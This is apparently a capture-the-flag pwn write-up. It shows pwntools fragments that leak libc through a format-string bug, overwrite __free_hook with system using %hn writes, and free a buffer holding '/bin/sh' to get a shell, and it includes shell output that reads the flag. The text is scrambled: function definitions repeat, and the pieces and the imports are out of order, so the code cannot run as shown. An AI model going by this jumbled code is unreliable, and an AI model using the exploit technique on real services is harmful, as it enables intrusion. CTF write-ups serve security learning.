Sone-127 2021 -

def main(): io = remote(HOST, PORT)

def get_shell(io): # Upload a file containing /bin/sh io.sendlineafter(b'> ', b'upload sh.txt') io.sendlineafter(b'Enter size: ', b'8') io.send(b'/bin/sh') io.recvuntil(b'> ')

> upload sh.txt [uploading 8 bytes] /bin/sh The service stores the content in a heap chunk. When we later request download sh.txt , the binary will free the buffer after sending the content. Because __free_hook now points to system , free(buf) becomes system(buf) . Since buf points to the string "/bin/sh" , we get a shell. SONE-127 2021

| Function | Purpose | |----------|---------| | leak_libc | Uses the format‑string to leak a libc address and compute the base. | | write_free_hook | Crafts a two‑write %hn payload that stores system at __free_hook . | | get_shell | Uploads a chunk containing /bin/sh and then frees it, invoking system . | | main | Orchestrates the steps and drops

io.sendlineafter(b'> ', b'echo ' + payload) io.recvuntil(b'> ') # sync back to prompt def main(): io = remote(HOST, PORT) def get_shell(io):

HOST = 'sone-127.ctf.example.com' PORT = 31337

# 3️⃣ Get a shell get_shell(io)

from pwn import *

> download sh.txt /bin/sh $ id uid=1000(ctf) gid=1000(ctf) groups=1000(ctf) $ cat /flag.txt FLAGSONE_127_2021_4c7f5b Success! #!/usr/bin/env python3 # -*- coding: utf-8 -*- Since buf points to the string "/bin/sh" , we get a shell